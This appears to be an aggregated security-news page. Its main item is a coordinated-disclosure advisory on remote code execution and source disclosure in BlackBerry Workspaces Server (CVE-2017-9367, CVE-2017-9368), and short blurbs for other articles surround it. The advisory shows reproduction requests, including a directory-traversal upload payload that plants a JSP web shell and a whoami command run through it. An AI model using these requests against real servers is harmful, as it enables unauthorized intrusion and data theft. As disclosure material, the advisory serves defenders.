Year in Review: How Did the Cyberthreat Landscape Change in 2017?

Over the course of 2017, the cyberthreat landscape shifted to accommodate a sharper focus on pure data destruction for the sake of disruption rather than monetary gain.

The post Year in Review: How Did the Cyberthreat Landscape Change in 2017? appeared first on Security Intelligence.

What Can We Learn From the ‘Global State of Information Security Survey 2018’?

While PwC’s “Global State of Information Security Survey” noted that governments have improved cyber resilience, businesses still have a long way to go.

The post What Can We Learn From the ‘Global State of Information Security Survey 2018’? appeared first on Security Intelligence.

Remote Code Execution in BlackBerry Workspaces Server

Overview

Gotham Digital Science (GDS) has discovered a vulnerability affecting BlackBerry Workspaces Server (formerly WatchDox). Prior to being patched, it was possible to remotely execute arbitrary code by exploiting insecure file upload functionality as an unauthenticated user. Additionally, source code disclosure was possible by issuing an HTTP request for a Node.js file inside of the server’s webroot.

CVE-2017-9367 and CVE-2017-9368 were discovered by Eric Rafaloff during a client engagement conducted by Gotham Digital Science.

BlackBerry’s security advisory regarding these vulnerabilities is available here: BSRT-2017-006

Vulnerable Versions

The following Workspaces Server components are known to be vulnerable:

  • Appliance-X versions 1.11.2 and earlier
  • vApp versions 5.6.0 to 5.6.6
  • vApp versions 5.5.9 and earlier

Timeline

  • 5/10/17 – CVE-2017-9367 and CVE-2017-9368 disclosed to BlackBerry.
  • 5/10/17 – BlackBerry acknowledges receiving our report.
  • 5/16/17 – BlackBerry confirms that an investigation has started.
  • 6/6/17 – BlackBerry confirms the reported security vulnerabilities and communicates that they will be issuing two CVEs.
  • 6/28/17 – BlackBerry confirms that development has started on fixes for the two reported vulnerabilities, requests delay of disclosure.
  • 9/6/17 – BlackBerry states that their advisory is expected to be made on September 12th.
  • 9/7/17 – BlackBerry states that their advisory will need to be pushed back until October 10th, requests additional delay of disclosure.
  • 9/13/17 – BlackBerry requests additional delay of disclosure to October 16th.
  • 10/16/17 – GDS and BlackBerry coordinated disclosure.

GDS commends BlackBerry for their diligence and consistent communication during the disclosure process.

Issue Description

The BlackBerry Workspaces Server offers a file server API, with which files can be uploaded and downloaded. GDS found that by making an unauthenticated HTTP GET request for /fileserver/main.js, it was possible to view the file server’s source code (CVE-2017-9368).

Reproduction Request #1

GET /fileserver/main.js HTTP/1.1
Host: [REMOVED BY GDS]

Reproduction Response #1

HTTP/1.1 200 OK
[..snip..]

By analyzing this disclosed source code, GDS located a directory traversal vulnerability affecting the saveDocument endpoint of the file server API. This endpoint did not require authentication, and when exploited allowed GDS to obtain remote code execution by uploading a web shell to the server’s webroot (CVE-2017-9367).

Reproduction Request #2

POST /fileserver/saveDocument HTTP/1.1
[..snip..]
Content-Type: multipart/form-data; boundary=---------------------------1484231460308104668732082159
Content-Length: 1286
 
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uuid"
 
/../../mnt/filespace/0/whiteLabel/
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="fileName"
 
shell.jsp
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="store"
 
local
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uploadFile"; filename="test"
 
[..snip..]
-----------------------------1484231460308104668732082159--

Reproduction Response #2

HTTP/1.1 200 OK
[..snip..]
 
{"success":"true"}

Reproduction Request #3

GET /whiteLabel/shell.jsp?cmd=whoami HTTP/1.1
[..snip..]

Reproduction Response #3

HTTP/1.1 200 OK
[..snip..]
 
<pre>Command was: <b>whoami</b>
 
watchdox
</pre>

Impact

CVE-2017-9368 allows unauthorized disclosure of application source code. This can be exploited by an unauthenticated user to discover additional security vulnerabilities (such as CVE-2017-9367).

CVE-2017-9367 allows an unauthenticated user to upload and run executable code, and as such can be used to compromise the integrity of the entire application and its data. For example, upon exploitation of this vulnerability, GDS was able to read the contents of the Workspaces Server’s database and compromise highly sensitive information.

Remediation

GDS recommends that affected users update immediately to a patched version of the product. BlackBerry has confirmed that the following Workspaces Server components are not affected:

  • Appliance-X version 1.12.0 and later
  • Appliance-X version 1.11.3 and later
  • vApp version 5.7.2 and later
  • vApp version 5.6.7 and later
  • vApp version 5.5.10 and later

The post Remote Code Execution in BlackBerry Workspaces Server appeared first on Security Boulevard.

Weighing the Benefits and Challenges of Cognitive Adoption

While it promises to improve quality of life across the globe, many are resistant to widespread cognitive adoption due to fear of change and other factors.

The post Weighing the Benefits and Challenges of Cognitive Adoption appeared first on Security Intelligence.

Getting Ahead of SD-WAN Security With the Zero Trust Model

According to recent studies, security is the top concern among organizations implementing software-defined wide area network (SD-WAN) technology.

The post Getting Ahead of SD-WAN Security With the Zero Trust Model appeared first on Security Intelligence.

Government Agencies Must Work With the Private Sector to Bolster Infrastructure Security

To improve infrastructure security per the president’s executive order, government agencies must build trust with the private security industry.

The post Government Agencies Must Work With the Private Sector to Bolster Infrastructure Security appeared first on Security Intelligence.

Cybercrime Without Borders: Bridging Gaps Between Public and Private Sectors to Ensure a Safer Future

Cybercrime affects businesses and government agencies equally, so why shouldn’t the public and private sectors collaborate to secure their critical assets?

The post Cybercrime Without Borders: Bridging Gaps Between Public and Private Sectors to Ensure a Safer Future appeared first on Security Intelligence.

Who Is Responsible for Cloud Security?

Cloud security must be a team effort between providers and customers. The distribution of responsibility depends on the cloud model.

The post Who Is Responsible for Cloud Security? appeared first on Security Intelligence.

Big Changes Around the Corner for the IoT

The IoT is transforming before our eyes due to increasing regulations, growing demand for security standards and advancements in the telecom industry.

The post Big Changes Around the Corner for the IoT appeared first on Security Intelligence.

How to Ensure the Success of a Hot Desking Strategy

A hot desking strategy allows employees to sit wherever they want, creating more flexibility for workers and more complexity for IT managers.

The post How to Ensure the Success of a Hot Desking Strategy appeared first on Security Intelligence.
